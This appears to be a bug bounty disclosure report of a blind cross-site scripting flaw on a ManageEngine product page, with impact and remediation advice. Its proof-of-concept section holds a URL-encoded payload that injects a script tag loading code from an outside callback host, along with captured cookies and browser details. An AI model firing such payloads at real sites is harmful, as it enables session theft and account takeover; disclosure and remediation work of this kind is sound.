# Blind XSS Vulnerability Report

## Description

A blind Cross-Site Scripting (XSS) vulnerability has been discovered in the

application, where user input is not properly sanitized before being displayed on
the page. This allows an attacker to inject malicious JavaScript code into the
page, which can be executed by any users who view the affected page.
## Proof of Concept

The following information was captured as part of the proof of concept (POC) for
this vulnerability:

- **URI**: [https://www.manageengine.com/products/desktop-central/service-
packs.html?buildNumber=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Frockstar.bxss.in%3E%3C
%2Fscript%3E](https://www.manageengine.com/products/desktop-central/service-
packs.html?buildNumber=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Frockstar.bxss.in%3E%3C
%2Fscript%3E)
- **Cookies**: ME_CC=IN; ME_CN=india; ME_CT=bangalore; ME_RG=Karnataka;
memarketing-_zldp=Mltw9Iqq5RSV1%2B9XJRRxXlth3awOlMRRRjF7Oq0jsHloK%2Fl%2F8LDj6%2FU
%2Blfi%2FGq4KnJBDdt7K%2B1o%3D; memarketing-_uuid=35c19955-6161-4a85-a54d-
976e6fcfe614_a334; zip=49.37.169.52|IN|india|Karnataka|bangalore|asia|-;
memarketing-_zldt=ec029134-8d9d-4134-ac90-bfc99763f613-0; _zwaf_ua=Brave;
gtm_ME_Source=bugbounty.zohocorp.com:ME|bugbounty.zohocorp.com:ME|
bugbounty.zohocorp.com:evaluators|bugbounty.zohocorp.com:support|direct:DC; ME-
MarkSrc=bugbounty.zohocorp.com:ME|direct:DC|direct:DC; ME-MarkRefURL=
%26%26%40%26%26https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fwww.manageengine.com%2Fproducts%2Fdesktop-central
%2Fservice-packs.html%3FbuildNumber%3D%2522%253E%253Cscript%2520src%253Dhttps%253A
%252F%252Frockstar.bxss.in%253E%253C%252Fscript%253E
- **Referrer**: []()
- **User Agent**: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
- **Browser Time**: 2024-06-27T06:03:53.040Z
- **Origin**: [https://www.manageengine.com](https://www.manageengine.com)
- **DOM**: Please see the attached document for the DOM at the time of the POC.
- **Screenshot**: Please see the attached screenshot for the page at the time of
the POC.- **Hostname**: rockstar.bxss.in

This information can be used to recreate the POC and further investigate the
vulnerability.

## Impact

An attacker can use this vulnerability to steal sensitive information from other
users, such as login credentials or personal information. They can also use it to
perform actions on behalf of other users, such as making unauthorized purchases or
posting malicious content.

## Remediation Steps

1. Sanitize all user input before displaying it on the page. This can be done by
using built-in functions in the programming language, or by using a library
specifically designed for this purpose.
2. Use a Content Security Policy (CSP) to further protect against XSS attacks.
This can be done by adding the appropriate headers to the application.

3. Regularly test the application for XSS vulnerabilities using tools such as
OWASP ZAP or Burp Suite.

## Recommendations

1. Train all developers on the importance of proper input validation and

sanitization, and ensure that they are aware of the risks associated with XSS
vulnerabilities.

2. Regularly review and update the application's security controls, including

input validation and sanitization, to ensure that they are up-to-date and
effective.

3. Consider implementing a bug bounty program to encourage security researchers to

report vulnerabilities in the application.

4. Stay informed about the latest XSS exploitation techniques and update the
application accordingly.

Note: The values above are just examples and not actual values from the real POC.